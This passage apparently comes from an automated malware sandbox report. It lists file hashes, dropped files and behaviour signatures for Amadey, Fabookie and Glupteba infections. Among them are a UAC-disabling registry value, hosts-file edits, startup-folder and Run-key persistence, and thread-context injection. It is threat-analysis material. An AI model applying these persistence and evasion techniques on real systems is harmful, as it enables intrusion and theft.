memory/2736-654-0x0000000000290000-0x0000000000390000-memory.dmp

memory/2752-645-0x000000000240B000-0x0000000002472000-memory.dmp

memory/2736-661-0x0000000000750000-0x000000000078E000-memory.dmp

memory/1744-664-0x000007FEF4F80000-0x000007FEF596C000-memory.dmp

memory/1020-667-0x0000000000D40000-0x0000000000D80000-memory.dmp

memory/2592-695-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1816-673-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1068-700-0x000000013F7F0000-0x000000013FD33000-memory.dmp

memory/2308-701-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/900-704-0x0000000004A00000-0x0000000004A40000-memory.dmp

memory/1328-705-0x00000000031A0000-0x00000000032D1000-memory.dmp

memory/1744-706-0x0000000000CF0000-0x0000000000D70000-memory.dmp

memory/372-707-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/1068-738-0x000000013F7F0000-0x000000013FD33000-memory.dmp

memory/564-739-0x0000000002630000-0x0000000002A28000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1744-736-0x000007FEF4F80000-0x000007FEF596C000-memory.dmp

memory/2796-745-0x0000000000400000-0x0000000000513000-memory.dmp

memory/2308-741-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1340-748-0x0000000000400000-0x000000000046A000-memory.dmp

memory/2308-749-0x0000000002A70000-0x000000000335B000-memory.dmp

memory/440-750-0x00000000006E0000-0x00000000007E0000-memory.dmp

memory/440-754-0x0000000000220000-0x000000000025E000-memory.dmp

memory/440-755-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/1540-757-0x0000000073F20000-0x000000007460E000-memory.dmp

memory/1540-759-0x0000000000A20000-0x0000000000DAE000-memory.dmp

memory/2096-786-0x0000000002230000-0x0000000002694000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NO1NR40C\s54[1].htm

MD5 e1671797c52e15f763380b45e841ec32
SHA1 58e6b3a414a1e090dfc6029add0f3555ccba127f
SHA256 3f79bb7b435b05321651daefd374cdc681dc06faa65e374e38337b88ca046dea
SHA512 87c568e037a5fa50b1bc911e8ee19a77c4dd3c22bce9932f86fdd8a216afe1681c89737fada6859e91047eece711ec16da62d6ccb9fd0de2c51f132347350d8c

memory/440-795-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2388-797-0x00000000026E0000-0x0000000002AD8000-memory.dmp

memory/2628-798-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1376-800-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/440-849-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/1376-852-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2096-860-0x0000000000400000-0x0000000000A00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin.bmp

MD5 343fa15c150a516b20cc9f787cfd530e
SHA1 369e8ac39d762e531d961c58b8c5dc84d19ba989
SHA256 d632e9dbacdcd8f6b86ba011ed6b23f961d104869654caa764216ea57a916524
SHA512 7726bd196cfee176f3d2002e30d353f991ffeafda90bac23d0b44c84c104aa263b0c78f390dd85833635667a3ca3863d2e8cd806dad5751f7984b2d34cafdc57

memory/2096-918-0x0000000003720000-0x0000000003F12000-memory.dmp

memory/2968-919-0x000000013F0F0000-0x000000013F633000-memory.dmp

memory/2096-926-0x00000000003F0000-0x00000000003F1000-memory.dmp

memory/2096-939-0x0000000004020000-0x0000000004160000-memory.dmp

memory/2096-947-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

memory/2096-948-0x0000000004020000-0x0000000004160000-memory.dmp

memory/2096-927-0x0000000004020000-0x0000000004160000-memory.dmp

memory/2096-949-0x0000000004020000-0x0000000004160000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3075857a467b8ad364dd31d6e934628
SHA1 10237f1b69595b6335a68ee707bd8b8bf98b1f1b
SHA256 283edee83cbba9228591ac901cf934a1f5d7ae4a046121d2559525ccaa9fd2bd
SHA512 d2208a3796ec8354ab5b7fc2c0603f191184485f237d64fefab59a9cf25c3a086f0d013663356a722448a6997495bc96800975faed456008ac4b7ae359f14962

memory/2096-958-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

memory/2096-967-0x0000000004020000-0x0000000004160000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d27e438077b3d7e668e1fc0f15ab57f9
SHA1 517f7baeb4f0092967fbe39ca1acbd00412324ed
SHA256 6ee76435cfc126169503fd96d5e0b8596be7bd07e411d9180b94106486d4659c
SHA512 6f744b86109c3c58c0000ec279b2eec5191e1edd70613917079760eae1db0e939932dfc69f9c69c554af90b4c39faebc565f420c887bbfca1c276a68974cf162

C:\ProgramData\48148754005569487756436495

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a843fe3264434ee444d2df4414fb3dec
SHA1 1facc2ff2d0585234c969831ae2ef4f864c83d88
SHA256 49f1f9152ab66059f21255dd3e422c410f5ee958eb8e3cc6eb0a53321c1ac8c0
SHA512 88aa3d92644345911aa2071f0f404b82c5a9b1d0df9e1e451ce30c8e783b4ec877640c6f78476cc3604f3f3da96f6bb8117cfb1b7e7962e10a14728049115fd3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 48d964524a6076f728081b69dd5ac9d6
SHA1 ea187bb2ce19f58a082d63de0bf3e0361db7b0b2
SHA256 b948f862a090f6e41c2989d2198b1ec871e98df07b9c3cb4c6c1d1423c95a83f
SHA512 2e827abef1634fdc8e858a5e846bcd1783141ac3a40f8979feb96d5ea82996a05c3b546229498be613b5a725a9c1631909c36034dd10ef808e415ac8d4bef91f

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 16c5b06f00f302535b41d6d5cfe87272
SHA1 bb27f7eb6142d70cae1a6f20d375216e6628c67a
SHA256 2efa91d3a3f561062caf2d151fc6e7d8548bba35ec68a49145d9740bc1b32c12
SHA512 4428b600060fa56d06b82d80ad1598541c45b2d58551e8475448ac1a45e364816f832e4639e09d0beba86046129c799ca442a4d8059902a0e797847dda421eb1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2SBOE92S\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-05 04:49

Reported

2023-10-05 04:54

Platform

win10-20230915-en

Max time kernel

183s

Max time network

299s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

UAC bypass

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STe8zMNkZx49l6tUzxyCaE3s.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkjhTle4mYByu4UtWNyhKnSP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8PPwvDWEb0C1FwH7RUYuIno.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chHai2fRstUaQMki9DJeKkq7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QjdcxAdqghsThluvntaHeHXx.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H5S4GLbgBBIv6htR4CmgZCYJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aumZElmi7f9DEiRDbhSUTdU6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CxHSb22ork2CKE6k5zWmaUR1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F33FGmUCYqofPk74eiDNpPQE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoABWjJrnGZPf1RXgI4GRReA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I29YNtRJQghKgeB5h5qW6sXr.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AlSUeUnZZ3aVcFZW7YL6GKky.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y8bMsEztqBJyOIs5ehrQweY9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe N/A
N/A N/A C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe N/A
N/A N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe N/A
N/A N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe N/A
N/A N/A C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
N/A N/A C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp N/A
N/A N/A C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
N/A N/A C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Xaetyfahubi.exe\"" C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5104 set thread context of 2344 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 5104 set thread context of 2980 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 5360 set thread context of 5352 N/A C:\Users\Admin\AppData\Local\Temp\0709047991.exe C:\Windows\servicing\TrustedInstaller.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LightCleaner\is-QI5RE.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-J30MM.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-ND3KL.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\Reference Assemblies\Xaetyfahubi.exe C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Xaetyfahubi.exe.config C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-0Q6KL.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-GL8T5.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\servicing\TrustedInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
